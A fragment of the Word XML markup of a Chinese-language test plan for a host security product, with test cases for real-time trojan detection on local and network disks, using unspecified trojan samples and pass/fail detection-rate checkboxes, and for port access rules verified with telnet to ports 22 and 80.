            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持主机全盘文件的实时监测防护，包括对网络磁盘的监测防护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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试产品是否支持本地磁盘及网络磁盘的文件监控</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否可以对新增文件全部进行实时木马检测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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>准备40个木马样本和10个普通文件，测试主机挂载网络磁盘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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7810" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right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1"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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="77"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端，开启全盘文件监控防护和病毒实时防护功能</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="77"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在测试主机系统根目录下新建/test目录</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="77"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将40个木马样本和10个普通文件上传至/test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="77"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在/home/ap/nas目录下挂载CFS网络磁盘</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="77"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将40个木马样本和10个普通文件分别上传至挂载的网络磁盘/home/ap/nas目录下</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="77"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务端上查看各个目录下是否都可以实时产生木马告警。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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果1（步骤2-3）：服务端上确认/test目录下的病毒木马检出率</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2（步骤4-5）：服务端上实时监测到/home/ap/nas的病毒木马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0"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支持本地盘监控</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t></w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持网络磁盘监控         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>病毒木马检出率95%以上   口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>病毒木马检出率90%-95%  口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>病毒木马检出率80%-90%  口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>病毒木马检出率80%以下   口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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3"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc15883"/>
      <w:bookmarkStart w:id="111" w:name="_Toc988633237"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc877837420"/>
      <w:bookmarkStart w:id="113" w:name="_Toc19845"/>
      <w:r>
        <w:t>端口安全策略</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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3"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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>端口安全策略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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>支持端口安全规则设置，设置规则对端口的访问性进行控制</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>开放了22、80远程连接端口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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="53"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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进入端口安全策略设置</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="53"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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Oracle-76-01设置端口策略，开放所有端口，22端口设置为禁止访问，确认保存，Oracle-76-02执行telnet {Oracle-76-01的ip} 22</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left"/>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telnet {Oracle-76-01的ip} 80</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="53"/>
              </w:numPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>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Redhat-67-01上设置端口策略，关闭所有端口，22端口设置为允许访问，确认保存，Redhat-67-02执行telnet {Redhat-67-01的ip} 80</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="1680" w:firstLineChars="800"/>
              <w:jc w:val="left"/>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telnet {Redhat-67-01的ip} 22端口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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="255"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果1（步骤2）：22端口连接失败，80端口连接成功</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果2（步骤3）：22端口连接成功，80端口连接失败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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634"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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
